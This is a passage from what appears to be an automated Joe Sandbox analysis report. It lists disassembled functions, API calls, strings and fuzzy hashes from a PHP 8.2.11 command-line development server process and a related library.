                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: Initialize_configthreadlocale_initialize_narrow_environment_initialize_onexit_table
                                                • String ID:
                                                • API String ID: 3623540455-0
                                                • Opcode ID: e2ee652f017bb5235b9bb3d929f129e0d50596157e2c27a12bf4c7f9274e1cb4
                                                • Instruction ID: 2312fc7f311d7e0d3efb8bceca43e20b7e9eb9564433a58f584ff52687548a6a
                                                • Opcode Fuzzy Hash: e2ee652f017bb5235b9bb3d929f129e0d50596157e2c27a12bf4c7f9274e1cb4
                                                • Instruction Fuzzy Hash: A9116A11E1C703D5FA587FBD94926B981B88FA1381FC45834E60D976C3EF1CA86986B2
                                                Function 00007FF7498C27E6 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00007FF7498C1900: _php_stream_open_wrapper_ex.PHP8TS ref: 00007FF7498C1932
                                                  • Part of subcall function 00007FF7498C1900: _php_stream_open_wrapper_ex.PHP8TS ref: 00007FF7498C1954
                                                  • Part of subcall function 00007FF7498C1900: _php_stream_open_wrapper_ex.PHP8TS ref: 00007FF7498C1976
                                                  • Part of subcall function 00007FF7498C1900: zend_register_constant.PHP8TS ref: 00007FF7498C1A30
                                                  • Part of subcall function 00007FF7498C1900: zend_register_constant.PHP8TS ref: 00007FF7498C1A62
                                                  • Part of subcall function 00007FF7498C1900: zend_register_constant.PHP8TS ref: 00007FF7498C1A94
                                                • php_execute_script.PHP8TS ref: 00007FF7498C2827
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _php_stream_open_wrapper_exzend_register_constant$php_execute_script
                                                • String ID:
                                                • API String ID: 371503814-0
                                                • Opcode ID: 81c57e5145dae83e29e8fdc5259998f075271bb271b9ec584aa362c08632d16b
                                                • Instruction ID: c456e221186ad2a7aa4bf69831b4f36cc2c93ebca8b1c87f58b4400cb9b5cc6c
                                                • Opcode Fuzzy Hash: 81c57e5145dae83e29e8fdc5259998f075271bb271b9ec584aa362c08632d16b
                                                • Instruction Fuzzy Hash: 8DE0C965A0DB46C6E714BF29E858679A378FB88B80F940135DA4E427A4CF6CE468D720

                                                Non-executed Functions

                                                Function 00007FF7498C97D0 Relevance: 96.7, APIs: 47, Strings: 8, Instructions: 415stringnetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$memmove$__acrt_iob_funcfprintfwcsncmp$ErrorLastphp_getoptzend_hash_destroy@@8$_efree@@8_set_errnoclosesocketmallocphp_selectphp_socket_strerrorphp_win32_code_to_errnophp_win32_cp_conv_ascii_to_wphp_win32_cp_conv_cur_to_wphp_win32_cp_conv_to_wphp_win32_cp_conv_utf8_to_wphp_win32_cp_get_by_idphp_win32_cp_use_unicodephp_win32_ioutil_normalize_path_wphp_win32_ioutil_stat_ex_wreallocsignalstrchrvirtual_getcwdvirtual_realpath
                                                • String ID: %s is not a directory.$8.2.11$Directory %s does not exist.$Document root path is too long.$PHP %s Development Server (http://%s%s%s:%d) started$\??\$\\?\$\\?\UNC\
                                                • API String ID: 3277354628-2852613766
                                                • Opcode ID: 8c93954c6ced0220989b0e366829cc54aead6a210609f2b6194a2b8fe6ddaebd
                                                • Instruction ID: fd8501b0f698afb0935bb8a3556af6aa88d7627fa40986b7ab0cdf0fd7cc6db1
                                                • Opcode Fuzzy Hash: 8c93954c6ced0220989b0e366829cc54aead6a210609f2b6194a2b8fe6ddaebd
                                                • Instruction Fuzzy Hash: DC126B61A0CB42C5EB10BF19E8546B9E3B9FB84794FC04136DA4E43AA8DF3DE565C720
                                                Function 00007FF7498C60A0 Relevance: 30.2, APIs: 20, Instructions: 163networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: closesocket$ErrorLastfreehtons$__zend_mallocbindgetsocknamelistenphp_network_freeaddressesphp_network_getaddressesphp_socket_error_strsetsockoptsocket
                                                • String ID:
                                                • API String ID: 218662337-0
                                                • Opcode ID: 35c43f8db9ddfd3d81eaef26489d84727e7901e10b2ff3b5887cd490dd5df3d3
                                                • Instruction ID: a8e875f28c9e61decfead145d61725781250ee24251c9a7a644aa8bc9432fcd1
                                                • Opcode Fuzzy Hash: 35c43f8db9ddfd3d81eaef26489d84727e7901e10b2ff3b5887cd490dd5df3d3
                                                • Instruction Fuzzy Hash: F8615E21A0CB46C6E754BF699448239F3B8FB44BA1F848336DA6E477D4EF3C94659320
                                                Function 00007FF7498CC4E4 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                • String ID:
                                                • API String ID: 313767242-0
                                                • Opcode ID: 3d435e9e628bf398d9dc564d4999422fffc84ae9fc7b77db05bdc8e354c6d876
                                                • Instruction ID: 0743c9fd8fb7b17f380e5e44b54e2c00e283f2fe917f4f16e65604ddf57fa4c7
                                                • Opcode Fuzzy Hash: 3d435e9e628bf398d9dc564d4999422fffc84ae9fc7b77db05bdc8e354c6d876
                                                • Instruction Fuzzy Hash: 06312D72609B81CAEB60BF68E8403E9B374FB94744F844439DA4E47A94DF38D559C720
                                                Function 00007FFE1A528F04 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+
                                                • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                • API String ID: 2943138195-1482988683
                                                • Opcode ID: fe645fa0cf9fb8fb38c7106db32793c54410b780dee10ccae4a95b5c2ef7be77
                                                • Instruction ID: a89f6efa042fb86443de02ee87dcbf44eb1ca99a5f5025516cf15849b101cdb5
                                                • Opcode Fuzzy Hash: fe645fa0cf9fb8fb38c7106db32793c54410b780dee10ccae4a95b5c2ef7be77
                                                • Instruction Fuzzy Hash: 2B024F72F1CE12D4FB148BA6D4941BC2672BB56BA4F5041FBDA0D52BB8DF38A505C380
                                                Function 00007FF7498C38D0 Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 223COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$ErrorLastphp_win32_code_to_errnowcsncmp$_set_errno$mallocmemmovephp_win32_cp_conv_ascii_to_wphp_win32_cp_conv_cur_to_wphp_win32_cp_conv_to_wphp_win32_cp_conv_utf8_to_wphp_win32_cp_get_by_idphp_win32_cp_use_unicodephp_win32_ioutil_normalize_path_wphp_win32_ioutil_open_wrealloc
                                                • String ID: \??\$\\?\$\\?\UNC\
                                                • API String ID: 1464380497-3428951470
                                                • Opcode ID: 2d54bd63f170202ab04089bff46cbf94a927c3c721595b4fc28526d501e83e49
                                                • Instruction ID: a788c0354963012951fdd86a389009420fc436681c24406acf5ec0f39c37e000
                                                • Opcode Fuzzy Hash: 2d54bd63f170202ab04089bff46cbf94a927c3c721595b4fc28526d501e83e49
                                                • Instruction Fuzzy Hash: 0C911B26B1CB42C5EB11BF69D854278A779AB48BA4F844036DE0E53794DF3CE466C320
                                                Function 00007FF7498C3C60 Relevance: 47.6, APIs: 25, Strings: 2, Instructions: 393COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_realloc@@16$smart_str_erealloc@@16$memmove
                                                • String ID: HTTP$Unknown Status Code
                                                • API String ID: 1291240017-3405413774
                                                • Opcode ID: 3660c69ec9d2100ce60dec02188879966e183b12cec36f0991f99f15e29da53d
                                                • Instruction ID: a1f296962da3f02168740a348b917abab1c11c0484a7c5a08f9ed09e3f2b3306
                                                • Opcode Fuzzy Hash: 3660c69ec9d2100ce60dec02188879966e183b12cec36f0991f99f15e29da53d
                                                • Instruction Fuzzy Hash: 7FF14A62A0CB46C2EA14BF2DD554269E7B8EB94FC4F944432CA0D077A9DF3CE466D321
                                                Function 00007FF7498C41C0 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 208COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_erealloc@@16smart_str_realloc@@16$memmove$_efree@@8gettimeofdayphp_format_datezend_hash_str_find@@24
                                                • String ID: GMT$D, d M Y H:i:s$Date: $Host: $host
                                                • API String ID: 1682851168-854820404
                                                • Opcode ID: 129281e655ddf9795ca426d980f0d66eb4df6fa436e6d10b183bd275987dd2e2
                                                • Instruction ID: 309f68c2bfa8d1669d08b3c6926a4baac90983cfc99b6618e0a6b16807a1626e
                                                • Opcode Fuzzy Hash: 129281e655ddf9795ca426d980f0d66eb4df6fa436e6d10b183bd275987dd2e2
                                                • Instruction Fuzzy Hash: 38A12866A0DB42C2EB14BF29D554228B3B9FB98F84B544532DE1D477A8DF3CE4A5C320
                                                Function 00007FF7498C8C70 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 216stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zend_strndup@@16$__acrt_iob_func_zend_hash_init@@32fprintffreestrchrstrtol$__stdio_common_vfprintf_efree@@8getenvphp_set_sock_blockingzend_hash_str_add@@32
                                                • String ID: Failed to listen on %s:%d (reason: %s)$Failed to make server socket non-blocking$Invalid address: %s$PHP_CLI_SERVER_WORKERS$forking is not supported on this platform
                                                • API String ID: 2318142898-2925817685
                                                • Opcode ID: d4bc668cacf4ce87a68d813501a73dd0acabbbd055e5f2502dfbffcebc98f243
                                                • Instruction ID: 78886d2bd8c875433b353b10d19b930078b2e4d8318164fe25a823487c937ec2
                                                • Opcode Fuzzy Hash: d4bc668cacf4ce87a68d813501a73dd0acabbbd055e5f2502dfbffcebc98f243
                                                • Instruction Fuzzy Hash: EFA15E22A1DB86D2FB14BF19A4043A9E7A9FB45BA4F848231DA6D037D5DF3CE465C310
                                                Function 00007FF7498C9470 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 213networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __zend_malloc_efree@@8$ErrorLast_zend_hash_init@@32free$acceptclosesocketmemmovephp_network_populate_name_from_sockaddrphp_set_sock_blockingphp_socket_strerrorzend_hash_index_find@@16zend_hash_index_update@@24zend_vspprintf
                                                • String ID: %s Accepted$Failed to accept a client (reason: %s)
                                                • API String ID: 652531883-3364014137
                                                • Opcode ID: f2eae3aaf2169fe42d004c392480f2988ea9d1e544c5634b1c99ed9a1b50c2db
                                                • Instruction ID: 793e57e44805cb1acc25caced188fc6737293a24407b45c9a06b171dd50774ff
                                                • Opcode Fuzzy Hash: f2eae3aaf2169fe42d004c392480f2988ea9d1e544c5634b1c99ed9a1b50c2db
                                                • Instruction Fuzzy Hash: 6B914F76A08B81C6E714BF29E4446A9B3B8FB847A0F948135CB9E47790DF3DE4A5D310
                                                Function 00007FFE1A52C7AC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 289COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: Name::operator+$Replicator::operator[]
                                                • String ID: `anonymous namespace'
                                                • API String ID: 3863519203-3062148218
                                                • Opcode ID: b6c8833087229f8ff0d58364892c90fb28097fc250b0c2ab6d56ce5395c29493
                                                • Instruction ID: 485ac97fbae885c96ed1dc13533c94b047d2a5fea9698cf54bcf1ca8e8cf1e65
                                                • Opcode Fuzzy Hash: b6c8833087229f8ff0d58364892c90fb28097fc250b0c2ab6d56ce5395c29493
                                                • Instruction Fuzzy Hash: 7AE14972A0CF82D9EB10CFA6E4801B977A1FB46B54F8041B7EA4D17A66DF38E554C740
                                                Function 00007FF7498C91B0 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 169networkstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: free$send$ErrorLast__zend_malloc__zend_strdup_close_efree@@8_errno_readstrerrorzend_hash_index_del@@16zend_vspprintf
                                                • String ID: %s Closing
                                                • API String ID: 1972148529-2100637938
                                                • Opcode ID: ca59df10b15f97131bfe11613ec40dd3ddb55263fee77ab41a4b870787dc6227
                                                • Instruction ID: 5a6ee4db6990784659bfce784212722804e1a3acbf76f99bcc9b5226dc3a1c5d
                                                • Opcode Fuzzy Hash: ca59df10b15f97131bfe11613ec40dd3ddb55263fee77ab41a4b870787dc6227
                                                • Instruction Fuzzy Hash: CC714A72A0DB42C6EA19BF29A450279F3B8FB49B94F845579CA5E07790DF3DE4708320
                                                Function 00007FF7498C8020 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 343stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: smart_str_realloc@@16$__zend_malloc__zend_strdup_errnoap_php_snprintfbsearchmemmovephp_escape_html_entities_exstrerrorstrncmp
                                                • String ID: Type: $t=UTF-8$text/
                                                • API String ID: 2476624890-508784794
                                                • Opcode ID: 219f8213f5cc79b96c31693368551871eba4e521372a1bd6107eaef3ff0ace66
                                                • Instruction ID: 8610d4294e662b6bf4f2a0ab3bd176630d5a3276fb025738a52d0e392868255c
                                                • Opcode Fuzzy Hash: 219f8213f5cc79b96c31693368551871eba4e521372a1bd6107eaef3ff0ace66
                                                • Instruction Fuzzy Hash: F6F19C62B08B59C6FB04BF69D8442ACA7B9FB45B84F904136CE5D1B794CF38E462C350
                                                Function 00007FFE1A52D5D0 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 359COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2897264735.00007FFE1A521000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                • Associated: 00000018.00000002.2897224013.00007FFE1A520000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897325854.00007FFE1A531000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897368952.00007FFE1A536000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                • Associated: 00000018.00000002.2897411710.00007FFE1A537000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ffe1a520000_php.jbxd
                                                Similarity
                                                • API ID: NameName::$Name::operator+atolswprintf_s
                                                • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                • API String ID: 2331677841-2441609178
                                                • Opcode ID: 02cc3120799feeee523a6e31c5e8f77ede782e7b6fd9332275c3751b0d8d0444
                                                • Instruction ID: d84cd7b324f9dfc5540dbebee406eea9f1fb9d9a7757f6f0aae3b7f5f05deb88
                                                • Opcode Fuzzy Hash: 02cc3120799feeee523a6e31c5e8f77ede782e7b6fd9332275c3751b0d8d0444
                                                • Instruction Fuzzy Hash: 70F16963F0CE42C4FB15ABE685941BC26A2AF56F64F0401F7DA4E26AB5DE3CA548C240
                                                Function 00007FF7498C5D70 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 160COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8$zend_spprintf$php_win32_console_fileno_has_vt100php_win32_console_fileno_is_consolezend_vspprintf
                                                • String ID: - %s$ - %s in %s on line %d$%s [%d]: %s %s$%s%s%s
                                                • API String ID: 2680666100-2629286828
                                                • Opcode ID: f29ed2ed63fb801c7bf3eeb7f9548956393755c4ed14e6805a4989288eacaf68
                                                • Instruction ID: a3ab85831819f8a770eef40076004533edadb485913118dd6b59a7b9c67d2a73
                                                • Opcode Fuzzy Hash: f29ed2ed63fb801c7bf3eeb7f9548956393755c4ed14e6805a4989288eacaf68
                                                • Instruction Fuzzy Hash: AA714F32A0CB82C2EB60BF09E4446A9B3B8FB84B90F858136DA4D97754DF3CE565C750
                                                Function 00007FF7498C2B39 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: zval_ptr_dtor$_emalloc@@8gc_possible_root@@8memmoveobject_init_exstrstrzend_call_known_functionzend_objects_store_del@@8zend_print_zvalzend_read_property
                                                • String ID: Exception: %s$message
                                                • API String ID: 3707280532-2516933299
                                                • Opcode ID: 697fa615da54bf2adc681ba011c9616f643d2a12a93e33b2775212efd4d0b561
                                                • Instruction ID: de6255e215c2d8d032c32cbaa096bf2b84e39fa8c486786c19b57b3c751bc7c9
                                                • Opcode Fuzzy Hash: 697fa615da54bf2adc681ba011c9616f643d2a12a93e33b2775212efd4d0b561
                                                • Instruction Fuzzy Hash: 4761FB35A0CB86C5EB10BF19D8443A8A774FB98B98F808632DA5D077A4DF7CE1A5D310
                                                Function 00007FF7498C4D70 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 115stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: _efree@@8php_register_variable_safestrcmp$_estrndup@@16toupperzend_spprintf
                                                • String ID: %s_%s$CONTENT_LENGTH$CONTENT_TYPE$HTTP
                                                • API String ID: 2128054003-3041116971
                                                • Opcode ID: 117c798415cb49a4b41e6d7d1edf8e5a78bfa11e927b1eedf5904637312086ef
                                                • Instruction ID: a10ef420a4c018ab7a851202f537868516282670e48d2b6539c0238768fe3c22
